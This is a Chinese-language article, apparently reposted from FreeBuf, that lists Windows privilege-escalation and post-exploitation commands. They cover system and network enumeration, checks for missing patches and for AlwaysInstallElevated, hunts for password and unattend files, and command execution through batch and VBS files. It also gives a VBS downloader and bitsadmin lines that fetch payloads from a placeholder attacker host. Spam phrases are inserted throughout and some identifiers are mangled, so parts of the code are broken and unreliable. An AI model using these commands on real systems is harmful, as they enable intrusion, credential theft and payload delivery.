這不是一篇滲透測(cè)試指導(dǎo)最簡(jiǎn)單的內(nèi)網(wǎng)穿透，而是簡(jiǎn)單介紹了幾個(gè)Windows內(nèi)網(wǎng)提權(quán)最簡(jiǎn)單的內(nèi)網(wǎng)穿透的實(shí)用命令最簡(jiǎn)單的內(nèi)網(wǎng)穿透，以供我等菜鳥學(xué)習(xí)觀摩，還望大牛包涵指導(dǎo)。

　　1

　　獲取操作系統(tǒng)信息

　　識(shí)別操作系統(tǒng)名稱及版本：

　　C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

　　OS Name: Microsoft Windows 10Pro

　　OS Version: 10.0.14393N/A Build 14393

　　當(dāng)然中文系統(tǒng)最簡(jiǎn)單的內(nèi)網(wǎng)穿透你得這樣：

　　systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"

　　識(shí)別系統(tǒng)體系結(jié)構(gòu)：

　　C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE%

　　AMD64

　　查看所有環(huán)境變量：

　　C:\Users\thel3l> SET

　　USERNAME=thel3l

　　USERPROFILE=C:\Users\thel3l

　　*snip*

　　查看某特定用戶信息：

　　C:\Users\thel3l>net user thel3l

　　User name thel3l

　　*snip*

　　The command completed successfully

　　2

　　獲取網(wǎng)絡(luò)信息

　　查看路由表信息：

　　C:\Users\thel3l> route print

　　查看ARP緩存信息：

　　C:\Users\thel3l> arp -A

　　查看防火墻規(guī)則：

　　C:\Users\thel3l> netstat -ano

　　C:\Users\thel3l> netsh firewall show config

　　C:\Users\thel3l> netsh firewall show state

　　3

　　應(yīng)用程序及服務(wù)信息

　　查看計(jì)劃任務(wù)：

　　C:\Users\thel3l> schtasks /QUERY /fo LIST /v

　　中文系統(tǒng)的命令，先調(diào)整GBK編碼為437美國編碼：

　　chcp 437

　　然后

　　schtasks /QUERY /fo LIST /v

　　查看服務(wù)進(jìn)程ID：

　　C:\Users\thel3l> tasklist /SVC

　　查看安裝驅(qū)動(dòng)：

　　C:\Users\thel3l> DRIVERQUERY

　　查看安裝程序和版本信息（漏洞利用線索）：

　　C:\Users\thel3l> wmic product list brief

　　查看服務(wù)、進(jìn)程和啟動(dòng)程序信息：

　　C:\Users\thel3l> wmic service list brief

　　C:\Users\thel3l> wmic process list brief

　　C:\Users\thel3l> wmic startup list brief

　　查看.msi程序的執(zhí)行權(quán)限：

　　C:\Users\thel3l> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

　　C:\Users\thel3l> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

　　查看是否設(shè)置有setuid和setgid：

　　C:\Users\thel3l>

　　reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

　　查看安裝補(bǔ)丁和時(shí)間信息：

　　C:\Users\thel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn

　　查看特定漏洞補(bǔ)丁信息：

　　C:\Users\thel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

　　4

　　敏感數(shù)據(jù)和目錄

　　查找密碼文件或其它敏感文件：

　　C:\Users\thel3l> cd/

　　C:\Users\thel3l> dir /b/s password.txt

　　C:\Users\thel3l> dir /b/s config.*

　　C:\Users\thel3l> findstr /si password *.xml *.ini *.txt

　　C:\Users\thel3l> findstr /si login *.xml *.ini *.txt

　　無人值守安裝文件：

　　這些文件通常包含模式的密碼信息。這類文件在一些大型企業(yè)網(wǎng)絡(luò)或GHO系統(tǒng)中可以發(fā)現(xiàn)，文件通常的位置如下：

　　C:\sysprep.inf

　　C:\sysprep\sysprep.xml

　　C:\Windows\Panther\Unattend\Unattended.xml

　　C:\Windows\Panther\Unattended.xml

　　5

　　文件系統(tǒng)

　　可以通過調(diào)用系統(tǒng)預(yù)安裝程序語言查看當(dāng)前可訪問目錄或文件權(quán)限，如python下：

　　import os; os.system("cmd /c {command here}")

　　使用copy con命令創(chuàng)建ftp執(zhí)行會(huì)話：

　　范例

　　C:\Users\thel3l> copy con ftp.bat#創(chuàng)建一個(gè)名為ftp.bat的批處理文件

　　ftp # 輸入執(zhí)行會(huì)話名稱，按回車到下一行，之后按CTRL+Z結(jié)束編輯，再按回車退出

　　C:\Users\thel3l> ftp.bat# 執(zhí)行創(chuàng)建的文件

　　ftp> # 執(zhí)行ftp命令

　　ftp> !{command}# e.g. - !dir or !ipconfig

　　使用copy con命令創(chuàng)建VBS腳本文件：

　　C:\Users\thel3l> copy con commandExec.vbs #創(chuàng)建VBS腳本文件

　　Call W.CreateObject("W.Shell").Run("cmd /K {command}", 8, True) #VBS文件內(nèi)容

　　C:\Users\thel3l>commandExec.vbs #執(zhí)行腳本文件

　　檢查文件夾可寫狀態(tài)：

　　C:\Users\thel3l> dir /a-r-d /s /b

　　6

　　一個(gè)有用的文件上傳腳本

　　' downloadfile.vbs

　　' Set your settings

　　strFileURL = "https://{YOUR_IP}/{FILE_NAME.EXT}"

　　strHDLocation ="c:\\{FILE_NAME.EXT}"

　　' Fetch the file

　　Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

　　objXMLHTTP.open "GET", strFileURL, false

　　objXMLHTTP.send()

　　If objXMLHTTP.Status = 200 Then

　　Set objADOStream = CreateObject("ADODB.Stream")

　　objADOStream.Open

　　objADOStream.Type = 1 'adTypeBinary

　　objADOStream.Write objXMLHTTP.ResponseBody

　　objADOStream.Position = 0 'Set the stream position to the start

　　Set objFSO = Createobject("ing.FileSystemObject")

　　If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

　　Set objFSO = Nothing

　　objADOStream.SaveToFile strHDLocation

　　objADOStream.Close

　　Set objADOStream = Nothing

　　End if

　　Set objXMLHTTP = Nothing

　　該腳本是一個(gè)社區(qū)發(fā)布的，你可以以下這種方式運(yùn)行它：

　　C:\Users\thel3l>c.exe downloadfile.vbs

　　bitsadmin命令：

　　如果你的目標(biāo)系統(tǒng)是Windows 7及以上操作系統(tǒng)，你可以使用bitsadmin命令，bitsadmin是一個(gè)命令行工具，可用于創(chuàng)建下載上傳進(jìn)程：

　　范例

　　C:\Users\thel3l> bitsadmin /transfer job_name /download /priority priority URL local\path\file

　　C:\Users\thel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT}

　　C:\Users\username\Downloads\{FILE_NAME.EXT}

　　如：

　　bitsadmin /transfer n https://download.fb.com/file/xx.zip c:\pentest\xx.zip

　　來源：https://www.freebuf.com/articles/system/114731.html

　　“煉石杯”網(wǎng)絡(luò)空間安全技能大賽

　　以賽促學(xué)、以技會(huì)友

　　更有諸多大獎(jiǎng)等你拿

　　詳情咨詢QQ群：478091920